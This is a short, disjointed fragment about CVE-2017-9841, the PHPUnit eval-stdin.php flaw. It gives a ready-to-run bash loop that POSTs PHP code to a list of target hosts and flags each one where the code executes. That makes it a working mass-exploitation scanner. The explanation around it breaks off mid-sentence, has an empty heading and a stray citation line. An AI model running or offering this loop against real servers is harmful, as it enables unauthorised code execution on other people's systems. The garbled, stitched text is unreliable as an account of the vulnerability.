This command would output:
for url in $(cat targets.txt); do curl -s -X POST -d "<?php echo md5('test'); ?>" "$url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" | grep -q "098f6bcd4621d373cade4e832627b4f6" && echo "$url is vulnerable"; done
The eval-stdin.php script evaluates PHP code from standard input: it reads the code, executes it, and returns the output. The script is often used in conjunction with other tools, such as the php command-line interpreter, to execute PHP code in a variety of contexts.
The eval-stdin.php script reads input from php://input (the raw body of an HTTP request) and passes it directly into the eval() function.
testing framework that was unintentionally left accessible to the public in many installations.

Why This is Significant

CVE-2017-9841 Detail - NVD, 21 Oct 2025